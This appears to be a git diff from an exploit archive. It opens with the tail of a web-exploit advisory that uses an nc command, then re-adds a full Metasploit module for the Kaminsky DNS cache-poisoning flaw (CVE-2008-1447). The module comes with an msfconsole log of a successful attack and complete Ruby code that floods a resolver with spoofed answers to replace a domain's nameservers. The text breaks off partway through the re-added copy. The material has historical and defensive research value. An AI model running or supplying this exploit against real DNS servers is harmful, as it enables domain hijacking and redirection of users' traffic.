                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 HTTP/1.0 + + nc SERVER PORT -v -v < webmodz4.txt + +GET /auth.w. HTTP/1.0 + + +####################################################################### + +====== +4) Fix +====== + + +No fix + + +####################################################################### + +# milw0rm.com [2008-05-03] diff --git a/platforms/multiple/remote/6122.rb b/platforms/multiple/remote/6122.rb index 6104c7fd6..0230797da 100755 --- a/platforms/multiple/remote/6122.rb +++ b/platforms/multiple/remote/6122.rb 
@@ -1,472 +1,472 @@ - ____ ____ __ __ - / \ / \ | | | | - ----====####/ /\__\##/ /\ \##| |##| |####====---- - | | | |__| | | | | | - | | ___ | __ | | | | | - ------======######\ \/ /#| |##| |#| |##| |######======------ - \____/ |__| |__| \______/ - - Computer Academic Underground - http://www.caughq.org - Exploit Code - -===============/======================================================== -Exploit ID: CAU-EX-2008-0003 -Release Date: 2008.07.23 -Title: bailiwicked_domain.rb -Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains -Tested: BIND 9.4.1-9.4.2 -Attributes: Remote, Poison, Resolver, Metasploit -Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt -Author/Email: I)ruid - H D Moore -===============/======================================================== - -Description -=========== - -This exploit targets a fairly ubiquitous flaw in DNS implementations -which allow the insertion of malicious DNS records into the cache of the -target nameserver. This exploit caches a single malicious nameserver -entry into the target nameserver which replaces the legitimate -nameservers for the target domain. By causing the target nameserver to -query for random hostnames at the target domain, the attacker can spoof -a response to the target server including an answer for the query, an -authority server record, and an additional record for that server, -causing target nameserver to insert the additional record into the -cache. This insertion completely replaces the original nameserver -records for the target domain. 
- - -Example -======= - -# /msf3/msfconsole - - ## ### ## ## - ## ## #### ###### #### ##### ##### ## #### ###### -####### ## ## ## ## ## ## ## ## ## ## ### ## -####### ###### ## ##### #### ## ## ## ## ## ## ## -## # ## ## ## ## ## ## ##### ## ## ## ## ## -## ## #### ### ##### ##### ## #### #### #### ### - ## - - - =[ msf v3.2-release -+ -- --=[ 298 exploits - 124 payloads -+ -- --=[ 18 encoders - 6 nops - =[ 73 aux - -msf > use auxiliary/spoof/dns/bailiwicked_domain -msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D -RHOST => A.B.C.D -msf auxiliary(bailiwicked_domain) > set DOMAIN example.com -DOMAIN => example.com -msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com -NEWDNS => dns01.metasploit.com -msf auxiliary(bailiwicked_domain) > set SRCPORT 0 -SRCPORT => 0 -msf auxiliary(bailiwicked_domain) > check -[*] Using the Metasploit service to verify exploitability... -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] FAIL: This server uses static source ports and is vulnerable to poisoning -msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D -[*] exec: dig +short -t ns example.com @A.B.C.D - -b.iana-servers.net. -a.iana-servers.net. - -msf auxiliary(bailiwicked_domain) > run -[*] Switching to target port 50391 based on Metasploit service -[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com -[*] Querying recon nameserver for example.com.'s nameservers... -[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. -[*] Querying recon nameserver for address of b.iana-servers.net.... -[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 -[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... -[*] b.iana-servers.net. 
is authoritative for example.com., adding to list of nameservers to spoof as -[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. -[*] Querying recon nameserver for address of a.iana-servers.net.... -[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 -[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... -[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as -[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... -[*] Sent 1000 queries and 20000 spoofed responses... -[*] Sent 2000 queries and 40000 spoofed responses... -[*] Sent 3000 queries and 60000 spoofed responses... -[*] Sent 4000 queries and 80000 spoofed responses... -[*] Sent 5000 queries and 100000 spoofed responses... -[*] Sent 6000 queries and 120000 spoofed responses... -[*] Sent 7000 queries and 140000 spoofed responses... -[*] Sent 8000 queries and 160000 spoofed responses... -[*] Sent 9000 queries and 180000 spoofed responses... -[*] Sent 10000 queries and 200000 spoofed responses... -[*] Sent 11000 queries and 220000 spoofed responses... -[*] Sent 12000 queries and 240000 spoofed responses... -[*] Sent 13000 queries and 260000 spoofed responses... -[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com -[*] Auxiliary module execution completed - -msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D -[*] exec: dig +short -t ns example.com @A.B.C.D - -dns01.metasploit.com. - - -Credits -======= - -Dan Kaminsky is credited with originally discovering this vulnerability. - -Cedric Blancher figured out the NS injection method and -was cool enough to email us and share! 
- - -References -========== - -http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 -http://www.kb.cert.org/vuls/id/800113 - - -Metasploit -========== - -require 'msf/core' -require 'net/dns' -require 'scruby' -require 'resolv' - -module Msf - -class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary - - include Exploit::Remote::Ip - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'DNS BailiWicked Domain Attack', - 'Description' => %q{ - This exploit attacks a fairly ubiquitous flaw in DNS implementations which - Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target - domains nameserver entries in a vulnerable DNS cache server. This attack works - by sending random hostname queries to the target DNS server coupled with spoofed - replies to those queries from the authoritative nameservers for that domain. - Eventually, a guessed ID will match, the spoofed packet will get accepted, and - the nameserver entries for the target domain will be replaced by the server - specified in the NEWDNS option of this exploit. - }, - 'Author' => - [ - ' I)ruid', 'hdm', - # - 'Cedric Blancher ' # Cedric figured out the NS injection method - # and was cool enough to email us and share! 
- # - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 5591 $', - 'References' => - [ - [ 'CVE', '2008-1447' ], - [ 'US-CERT-VU', '8000113' ], - [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], - ], - 'DisclosureDate' => 'Jul 21 2008' - )) - - register_options( - [ - OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), - OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), - OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), - OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), - OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), - OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), - ], self.class) - - end - - def auxiliary_commands - return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" } - end - - def cmd_check(*args) - targ = args[0] || rhost() - if(not (targ and targ.length > 0)) - print_status("usage: check [dns-server]") - return - end - - print_status("Using the Metasploit service to verify exploitability...") - srv_sock = Rex::Socket.create_udp( - 'PeerHost' => targ, - 'PeerPort' => 53 - ) - - random = false - ports = [] - lport = nil - - 1.upto(5) do |i| - - req = Resolv::DNS::Message.new - txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" - req.add_question(txt, Resolv::DNS::Resource::IN::TXT) - req.rd = 1 - - srv_sock.put(req.encode) - res, addr = srv_sock.recvfrom() - - - if res and res.length > 0 - res = Resolv::DNS::Message.decode(res) - res.each_answer do |name, ttl, data| - if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) - t_addr, t_port = $1.split(':') - - print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}") - t_port = t_port.to_i - if(lport and lport != t_port) - random = true - end - lport = t_port - ports << t_port - end - end - end - end - - 
srv_sock.close - - if(ports.length < 5) - print_status("UNKNOWN: This server did not reply to our vulnerability check requests") - return - end - - if(random) - print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}") - print_status(" This server may still be exploitable, but not by this tool.") - else - print_status("FAIL: This server uses static source ports and is vulnerable to poisoning") - end - end - - def run - target = rhost() - source = Rex::Socket.source_address(target) - sport = datastore['SRCPORT'] - domain = datastore['DOMAIN'] + '.' - newdns = datastore['NEWDNS'] - recons = datastore['RECONS'] - xids = datastore['XIDS'].to_i - newttl = datastore['TTL'].to_i - xidbase = rand(20001) + 20000 - - address = Rex::Text.rand_text(4).unpack("C4").join(".") - - srv_sock = Rex::Socket.create_udp( - 'PeerHost' => target, - 'PeerPort' => 53 - ) - - # Get the source port via the metasploit service if it's not set - if sport.to_i == 0 - req = Resolv::DNS::Message.new - txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" - req.add_question(txt, Resolv::DNS::Resource::IN::TXT) - req.rd = 1 - - srv_sock.put(req.encode) - res, addr = srv_sock.recvfrom() - - if res and res.length > 0 - res = Resolv::DNS::Message.decode(res) - res.each_answer do |name, ttl, data| - if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) - t_addr, t_port = $1.split(':') - sport = t_port.to_i - - print_status("Switching to target port #{sport} based on Metasploit service") - if target != t_addr - print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!") - end - end - end - end - end - - # Verify its not already poisoned - begin - query = Resolv::DNS::Message.new - query.add_question(domain, Resolv::DNS::Resource::IN::NS) - query.rd = 0 - - begin - cached = false - srv_sock.put(query.encode) - answer, addr = srv_sock.recvfrom() - - if answer and 
answer.length > 0 - answer = Resolv::DNS::Message.decode(answer) - answer.each_answer do |name, ttl, data| - - if((name.to_s + ".") == domain and data.name.to_s == newdns) - t = Time.now + ttl - print_status("Failure: This domain is already using #{newdns} as a nameserver") - print_status(" Cache entry expires on #{t.to_s}") - srv_sock.close - disconnect_ip - return - end - end - - end - end until not cached - rescue ::Interrupt - raise $! - rescue ::Exception => e - print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}") - end - - - res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver - - print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}" - - # Look up the nameservers for the domain - print_status "Querying recon nameserver for #{domain}'s nameservers..." - answer0 = res0.send(domain, Net::DNS::NS) - #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities" - - barbs = [] # storage for nameservers - answer0.answer.each do |rr0| - print_status " Got an #{rr0.type} record: #{rr0.inspect}" - if rr0.type == 'NS' - print_status " Querying recon nameserver for address of #{rr0.nsdname}..." - answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname - #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" - answer1.answer.each do |rr1| - print_status " Got an #{rr1.type} record: #{rr1.inspect}" - res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) - print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." - answer2 = res2.send(domain) - if answer2 and answer2.header.auth? 
and answer2.header.anCount >= 1 - nsrec = {:name => rr0.nsdname, :addr => rr1.address} - barbs << nsrec - print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" - end - end - end - end - - if barbs.length == 0 - print_status( "No DNS servers found.") - srv_sock.close - disconnect_ip - return - end - - # Flood the target with queries and spoofed responses, one will eventually hit - queries = 0 - responses = 0 - - connect_ip if not ip_sock - - print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...") - - while true - randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname - - # Send spoofed query - req = Resolv::DNS::Message.new - req.id = rand(2**16) - req.add_question(randhost, Resolv::DNS::Resource::IN::A) - - req.rd = 1 - - buff = ( - Scruby::IP.new( - #:src => barbs[0][:addr].to_s, - :src => source, - :dst => target, - :proto => 17 - )/Scruby::UDP.new( - :sport => (rand((2**16)-1024)+1024).to_i, - :dport => 53 - )/req.encode - ).to_net - ip_sock.sendto(buff, target) - queries += 1 - - # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) - req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) - req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) - req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored - req.qr = 1 - req.aa = 1 - - xidbase.upto(xidbase+xids-1) do |id| - req.id = id - barbs.each do |barb| - buff = ( - Scruby::IP.new( - #:src => barbs[i][:addr].to_s, - :src => barb[:addr].to_s, - :dst => target, - :proto => 17 - )/Scruby::UDP.new( - :sport => 53, - :dport => sport.to_i - )/req.encode - ).to_net - ip_sock.sendto(buff, target) - responses += 1 - end - end - - # status update - if queries % 1000 == 0 - print_status("Sent #{queries} queries and #{responses} spoofed responses...") - end - - # every so often, 
check and see if the target is poisoned... - if queries % 250 == 0 - begin - query = Resolv::DNS::Message.new - query.add_question(domain, Resolv::DNS::Resource::IN::NS) - query.rd = 0 - - srv_sock.put(query.encode) - answer, addr = srv_sock.recvfrom() - - if answer and answer.length > 0 - answer = Resolv::DNS::Message.decode(answer) - answer.each_answer do |name, ttl, data| - if((name.to_s + ".") == domain and data.name.to_s == newdns) - print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}") - srv_sock.close - disconnect_ip - return - end - end - end - rescue ::Interrupt - raise $! - rescue ::Exception => e - print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}") - end - end - - end - - end - -end -end - -# milw0rm.com [2008-07-23] + ____ ____ __ __ + / \ / \ | | | | + ----====####/ /\__\##/ /\ \##| |##| |####====---- + | | | |__| | | | | | + | | ___ | __ | | | | | + ------======######\ \/ /#| |##| |#| |##| |######======------ + \____/ |__| |__| \______/ + + Computer Academic Underground + http://www.caughq.org + Exploit Code + +===============/======================================================== +Exploit ID: CAU-EX-2008-0003 +Release Date: 2008.07.23 +Title: bailiwicked_domain.rb +Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains +Tested: BIND 9.4.1-9.4.2 +Attributes: Remote, Poison, Resolver, Metasploit +Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt +Author/Email: I)ruid + H D Moore +===============/======================================================== + +Description +=========== + +This exploit targets a fairly ubiquitous flaw in DNS implementations +which allow the insertion of malicious DNS records into the cache of the +target nameserver. This exploit caches a single malicious nameserver +entry into the target nameserver which replaces the legitimate +nameservers for the target domain. 
By causing the target nameserver to +query for random hostnames at the target domain, the attacker can spoof +a response to the target server including an answer for the query, an +authority server record, and an additional record for that server, +causing target nameserver to insert the additional record into the +cache. This insertion completely replaces the original nameserver +records for the target domain. + + +Example +======= + +# /msf3/msfconsole + + ## ### ## ## + ## ## #### ###### #### ##### ##### ## #### ###### +####### ## ## ## ## ## ## ## ## ## ## ### ## +####### ###### ## ##### #### ## ## ## ## ## ## ## +## # ## ## ## ## ## ## ##### ## ## ## ## ## +## ## #### ### ##### ##### ## #### #### #### ### + ## + + + =[ msf v3.2-release ++ -- --=[ 298 exploits - 124 payloads ++ -- --=[ 18 encoders - 6 nops + =[ 73 aux + +msf > use auxiliary/spoof/dns/bailiwicked_domain +msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D +RHOST => A.B.C.D +msf auxiliary(bailiwicked_domain) > set DOMAIN example.com +DOMAIN => example.com +msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com +NEWDNS => dns01.metasploit.com +msf auxiliary(bailiwicked_domain) > set SRCPORT 0 +SRCPORT => 0 +msf auxiliary(bailiwicked_domain) > check +[*] Using the Metasploit service to verify exploitability... +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] FAIL: This server uses static source ports and is vulnerable to poisoning +msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D +[*] exec: dig +short -t ns example.com @A.B.C.D + +b.iana-servers.net. +a.iana-servers.net. + +msf auxiliary(bailiwicked_domain) > run +[*] Switching to target port 50391 based on Metasploit service +[*] Targeting nameserver A.B.C.D for injection of example.com. 
nameservers as dns01.metasploit.com +[*] Querying recon nameserver for example.com.'s nameservers... +[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. +[*] Querying recon nameserver for address of b.iana-servers.net.... +[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 +[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... +[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as +[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. +[*] Querying recon nameserver for address of a.iana-servers.net.... +[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 +[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... +[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as +[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... +[*] Sent 1000 queries and 20000 spoofed responses... +[*] Sent 2000 queries and 40000 spoofed responses... +[*] Sent 3000 queries and 60000 spoofed responses... +[*] Sent 4000 queries and 80000 spoofed responses... +[*] Sent 5000 queries and 100000 spoofed responses... +[*] Sent 6000 queries and 120000 spoofed responses... +[*] Sent 7000 queries and 140000 spoofed responses... +[*] Sent 8000 queries and 160000 spoofed responses... +[*] Sent 9000 queries and 180000 spoofed responses... +[*] Sent 10000 queries and 200000 spoofed responses... +[*] Sent 11000 queries and 220000 spoofed responses... +[*] Sent 12000 queries and 240000 spoofed responses... +[*] Sent 13000 queries and 260000 spoofed responses... +[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com +[*] Auxiliary module execution completed + +msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D +[*] exec: dig +short -t ns example.com @A.B.C.D + +dns01.metasploit.com. 
+ + +Credits +======= + +Dan Kaminsky is credited with originally discovering this vulnerability. + +Cedric Blancher figured out the NS injection method and +was cool enough to email us and share! + + +References +========== + +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 +http://www.kb.cert.org/vuls/id/800113 + + +Metasploit +========== + +require 'msf/core' +require 'net/dns' +require 'scruby' +require 'resolv' + +module Msf + +class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary + + include Exploit::Remote::Ip + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS BailiWicked Domain Attack', + 'Description' => %q{ + This exploit attacks a fairly ubiquitous flaw in DNS implementations which + Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target + domains nameserver entries in a vulnerable DNS cache server. This attack works + by sending random hostname queries to the target DNS server coupled with spoofed + replies to those queries from the authoritative nameservers for that domain. + Eventually, a guessed ID will match, the spoofed packet will get accepted, and + the nameserver entries for the target domain will be replaced by the server + specified in the NEWDNS option of this exploit. + }, + 'Author' => + [ + ' I)ruid', 'hdm', + # + 'Cedric Blancher ' # Cedric figured out the NS injection method + # and was cool enough to email us and share! 
+ # + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 5591 $', + 'References' => + [ + [ 'CVE', '2008-1447' ], + [ 'US-CERT-VU', '8000113' ], + [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], + ], + 'DisclosureDate' => 'Jul 21 2008' + )) + + register_options( + [ + OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), + OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), + OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), + OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), + OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), + OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), + ], self.class) + + end + + def auxiliary_commands + return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" } + end + + def cmd_check(*args) + targ = args[0] || rhost() + if(not (targ and targ.length > 0)) + print_status("usage: check [dns-server]") + return + end + + print_status("Using the Metasploit service to verify exploitability...") + srv_sock = Rex::Socket.create_udp( + 'PeerHost' => targ, + 'PeerPort' => 53 + ) + + random = false + ports = [] + lport = nil + + 1.upto(5) do |i| + + req = Resolv::DNS::Message.new + txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" + req.add_question(txt, Resolv::DNS::Resource::IN::TXT) + req.rd = 1 + + srv_sock.put(req.encode) + res, addr = srv_sock.recvfrom() + + + if res and res.length > 0 + res = Resolv::DNS::Message.decode(res) + res.each_answer do |name, ttl, data| + if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) + t_addr, t_port = $1.split(':') + + print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}") + t_port = t_port.to_i + if(lport and lport != t_port) + random = true + end + lport = t_port + ports << t_port + end + end + end + end + + 
srv_sock.close + + if(ports.length < 5) + print_status("UNKNOWN: This server did not reply to our vulnerability check requests") + return + end + + if(random) + print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}") + print_status(" This server may still be exploitable, but not by this tool.") + else + print_status("FAIL: This server uses static source ports and is vulnerable to poisoning") + end + end + + def run + target = rhost() + source = Rex::Socket.source_address(target) + sport = datastore['SRCPORT'] + domain = datastore['DOMAIN'] + '.' + newdns = datastore['NEWDNS'] + recons = datastore['RECONS'] + xids = datastore['XIDS'].to_i + newttl = datastore['TTL'].to_i + xidbase = rand(20001) + 20000 + + address = Rex::Text.rand_text(4).unpack("C4").join(".") + + srv_sock = Rex::Socket.create_udp( + 'PeerHost' => target, + 'PeerPort' => 53 + ) + + # Get the source port via the metasploit service if it's not set + if sport.to_i == 0 + req = Resolv::DNS::Message.new + txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" + req.add_question(txt, Resolv::DNS::Resource::IN::TXT) + req.rd = 1 + + srv_sock.put(req.encode) + res, addr = srv_sock.recvfrom() + + if res and res.length > 0 + res = Resolv::DNS::Message.decode(res) + res.each_answer do |name, ttl, data| + if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) + t_addr, t_port = $1.split(':') + sport = t_port.to_i + + print_status("Switching to target port #{sport} based on Metasploit service") + if target != t_addr + print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!") + end + end + end + end + end + + # Verify its not already poisoned + begin + query = Resolv::DNS::Message.new + query.add_question(domain, Resolv::DNS::Resource::IN::NS) + query.rd = 0 + + begin + cached = false + srv_sock.put(query.encode) + answer, addr = srv_sock.recvfrom() + + if answer and 
answer.length > 0 + answer = Resolv::DNS::Message.decode(answer) + answer.each_answer do |name, ttl, data| + + if((name.to_s + ".") == domain and data.name.to_s == newdns) + t = Time.now + ttl + print_status("Failure: This domain is already using #{newdns} as a nameserver") + print_status(" Cache entry expires on #{t.to_s}") + srv_sock.close + disconnect_ip + return + end + end + + end + end until not cached + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}") + end + + + res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver + + print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}" + + # Look up the nameservers for the domain + print_status "Querying recon nameserver for #{domain}'s nameservers..." + answer0 = res0.send(domain, Net::DNS::NS) + #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities" + + barbs = [] # storage for nameservers + answer0.answer.each do |rr0| + print_status " Got an #{rr0.type} record: #{rr0.inspect}" + if rr0.type == 'NS' + print_status " Querying recon nameserver for address of #{rr0.nsdname}..." + answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname + #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" + answer1.answer.each do |rr1| + print_status " Got an #{rr1.type} record: #{rr1.inspect}" + res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) + print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." + answer2 = res2.send(domain) + if answer2 and answer2.header.auth? 
and answer2.header.anCount >= 1 + nsrec = {:name => rr0.nsdname, :addr => rr1.address} + barbs << nsrec + print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" + end + end + end + end + + if barbs.length == 0 + print_status( "No DNS servers found.") + srv_sock.close + disconnect_ip + return + end + + # Flood the target with queries and spoofed responses, one will eventually hit + queries = 0 + responses = 0 + + connect_ip if not ip_sock + + print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...") + + while true + randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname + + # Send spoofed query + req = Resolv::DNS::Message.new + req.id = rand(2**16) + req.add_question(randhost, Resolv::DNS::Resource::IN::A) + + req.rd = 1 + + buff = ( + Scruby::IP.new( + #:src => barbs[0][:addr].to_s, + :src => source, + :dst => target, + :proto => 17 + )/Scruby::UDP.new( + :sport => (rand((2**16)-1024)+1024).to_i, + :dport => 53 + )/req.encode + ).to_net + ip_sock.sendto(buff, target) + queries += 1 + + # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) + req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) + req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) + req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored + req.qr = 1 + req.aa = 1 + + xidbase.upto(xidbase+xids-1) do |id| + req.id = id + barbs.each do |barb| + buff = ( + Scruby::IP.new( + #:src => barbs[i][:addr].to_s, + :src => barb[:addr].to_s, + :dst => target, + :proto => 17 + )/Scruby::UDP.new( + :sport => 53, + :dport => sport.to_i + )/req.encode + ).to_net + ip_sock.sendto(buff, target) + responses += 1 + end + end + + # status update + if queries % 1000 == 0 + print_status("Sent #{queries} queries and #{responses} spoofed responses...") + end + + # every so often, 
